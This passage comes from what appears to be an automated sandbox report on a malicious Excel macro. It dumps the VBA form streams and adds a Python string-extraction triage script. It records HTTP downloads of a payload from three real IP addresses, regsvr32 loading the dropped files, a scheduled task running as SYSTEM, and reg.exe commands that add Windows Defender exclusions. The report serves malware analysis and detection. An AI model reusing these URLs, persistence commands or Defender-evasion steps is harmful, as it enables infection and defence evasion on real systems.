      Base64 Encoded:False
      Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
      Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.43722878834
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:302
      Entropy:4.65399600072
      Base64 Encoded:True
      Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
      Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
      Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/f
      File Type:data
      Stream Size:226
      Entropy:3.01175231218
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
      Data Raw:00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 6c 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 29 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32
      Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/o
      File Type:data
      Stream Size:272
      Entropy:3.6318384866
      Base64 Encoded:True
      Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
      Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00
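The UserForm2 streams above are where this sample keeps its strings: the \x03VBFrame caption is the API name URLDownloadToFileA, and the control data in the o stream carries the three download URLs and the label uRlMon (urlmon.dll exports that API), each stored as an MS-OFORMS caption whose 4-byte length prefix has bit 31 set (15 00 00 80 = 21 one-byte characters). Pulling these out without opening the document is a quick triage step. The following is an added example, not part of the report, that does it with a generic ASCII/UTF-16LE string sweep plus a heuristic decoder for the length-prefixed form strings. The two embedded byte strings are copied from the Data Raw dumps above (truncated where the report truncates them); the UTF-16 sample in the demo and the API watch list are constructed for illustration.

```python
import re

# Bytes copied from the report's "Data Raw" dump of _VBA_PROJECT_CUR/UserForm2/o.
# The report truncates the dump, so only the first URL and the "uRlMon" label are present;
# the "Data ASCII" view of the same stream shows two more http:// URLs further on.
USERFORM_O = bytes.fromhex(
    "00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f "
    "01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 "
    "54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 "
    "00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00"
)

# Bytes copied from the report's "Data Raw" dump of _VBA_PROJECT_CUR/UserForm2/\x03VBFrame (truncated by the report).
VBFRAME = bytes.fromhex(
    "56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 "
    "44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 "
    "6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 "
    "52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 20 48 65 69"
)

ASCII_RUN = re.compile(rb"[\x20-\x7e]{5,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){5,}")
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-?=&%]*)?", re.I)
# Constructed watch list: API and LOLBin names worth flagging inside form captions and labels.
API_WATCHLIST = ("urldownloadtofile", "urlmon", "shellexecute", "winexec",
                 "createprocess", "regsvr32", "rundll32", "virtualalloc")


def extract_strings(data):
    """Printable ASCII and UTF-16LE runs of 5+ characters, tagged with offset and encoding."""
    found = [(m.start(), "ascii", m.group().decode("ascii")) for m in ASCII_RUN.finditer(data)]
    found += [(m.start(), "utf16le", m.group().decode("utf-16-le")) for m in WIDE_RUN.finditer(data)]
    return sorted(found)


def decode_oforms_strings(data, max_len=1024):
    """Heuristic decoder for MS-OFORMS length-prefixed strings: a little-endian uint32 whose
    bit 31 (fCompressed) means one-byte characters, with the byte count in the low 31 bits.
    Returns (offset, text) for each prefix that is followed by exactly that many printable bytes."""
    out = []
    for i in range(len(data) - 3):
        val = int.from_bytes(data[i:i + 4], "little")
        n = val & 0x7FFFFFFF
        if not 1 <= n <= max_len or i + 4 + n > len(data):
            continue
        chunk = data[i + 4:i + 4 + n]
        if val & 0x80000000:
            if all(0x20 <= b <= 0x7E for b in chunk):
                out.append((i, chunk.decode("ascii")))
        elif n % 2 == 0 and WIDE_RUN.fullmatch(chunk):  # uncompressed form: UTF-16LE
            out.append((i, chunk.decode("utf-16-le")))
    return out


def find_iocs(data):
    """URLs and watch-listed API names gathered from both string passes, de-duplicated."""
    texts = [s for _, _, s in extract_strings(data)] + [s for _, s in decode_oforms_strings(data)]
    urls, apis = [], []
    for s in texts:
        for u in URL_RE.findall(s):
            if u not in urls:
                urls.append(u)
        if any(api in s.lower() for api in API_WATCHLIST) and s.strip() not in apis:
            apis.append(s.strip())
    return {"urls": urls, "apis": apis}


if __name__ == "__main__":
    print("UserForm2/o     :", find_iocs(USERFORM_O))
    print("UserForm2/VBFrame:", find_iocs(VBFRAME))
    # Constructed UTF-16LE sample (not from the sample) to show the wide-string path.
    print("constructed wide :", find_iocs("Label5 http://example.invalid/x.dll".encode("utf-16-le")))
```

The case-insensitive watch-list match is deliberate: the sample spells the DLL name uRlMon, which defeats a case-sensitive grep. Against a real file, run `find_iocs` over every stream under `_VBA_PROJECT_CUR/<FormName>/` (the `o` stream holds control data, `\x03VBFrame` the form properties), not only over the VBA modules, since captions never appear in the decompressed macro source.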
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4332
      Entropy:4.42025024054
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2461
      Entropy:3.4974013905
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . 3 . . d . A
      Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:data
      Stream Size:1047
      Entropy:6.66117755603
      Base64 Encoded:True

      Network Behavior

      Network Port Distribution

      TCP Packets


      HTTP Request Dependency Graph

      • 190.14.37.178
      • 185.183.96.67
      • 185.250.148.213

      HTTP Packets

      Session ID: 0
      Source IP: 192.168.2.22
      Source Port: 49167
      Destination IP: 190.14.37.178
      Destination Port: 80
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

      Timestamp: Sep 27, 2021 18:02:55.833929062 CEST, kBytes transferred: 0, Direction: OUT
      GET /44466.7516903935.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.178
      Connection: Keep-Alive
      Timestamp: Sep 27, 2021 18:02:56.845748901 CEST, kBytes transferred: 1, Direction: IN
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 16:02:56 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7516903935.dat"


      Session ID: 1
      Source IP: 192.168.2.22
      Source Port: 49168
      Destination IP: 185.183.96.67
      Destination Port: 80
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

      Timestamp: Sep 27, 2021 18:02:59.632400036 CEST, kBytes transferred: 405, Direction: OUT
      GET /44466.7516903935.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 185.183.96.67
      Connection: Keep-Alive
      Timestamp: Sep 27, 2021 18:02:59.857233047 CEST, kBytes transferred: 407, Direction: IN
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 16:02:59 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7516903935.dat"


      Session ID: 2
      Source IP: 192.168.2.22
      Source Port: 49169
      Destination IP: 185.250.148.213
      Destination Port: 80
      Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

      Timestamp: Sep 27, 2021 18:03:00.392646074 CEST, kBytes transferred: 811, Direction: OUT
      GET /44466.7516903935.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 185.250.148.213
      Connection: Keep-Alive
      Timestamp: Sep 27, 2021 18:03:00.667790890 CEST, kBytes transferred: 812, Direction: IN
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 16:03:00 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7516903935.dat"


      Code Manipulations

      Statistics

      Behavior


      System Behavior

      General

      Start time:18:02:22
      Start date:27/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f340000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:18:02:32
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd.red
      Imagebase:0xffd20000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:18:02:32
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd.red
      Imagebase:0x70000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:18:02:34
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xdc0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:18:02:35
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd1.red
      Imagebase:0xffd20000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:18:02:35
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
      Imagebase:0x120000
      File size:179712 bytes
      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:18:02:35
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd1.red
      Imagebase:0x6e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:18:02:37
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
      Imagebase:0xffd20000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:02:38
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xdc0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:02:38
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Drezd.red'
      Imagebase:0x6e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:02:39
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd2.red
      Imagebase:0xffd20000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:02:40
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xdc0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:02:40
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd2.red
      Imagebase:0x6e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:02:42
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
      Imagebase:0xff800000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:02:42
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xdc0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:02:43
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
      Imagebase:0xffcf0000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:03:19
      Start date:27/09/2021
      Path:C:\Windows\System32\wbem\WMIADAP.exe
      Wow64 process (32bit):false
      Commandline:wmiadap.exe /F /T /R
      Imagebase:0xff6f0000
      File size:182784 bytes
      MD5 hash:005247E3057BC5D5C3F8C6F886FFC10C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:04:00
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
      Imagebase:0xffd30000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:18:04:00
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Drezd.red'
      Imagebase:0xf30000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Disassembly

      Code Analysis
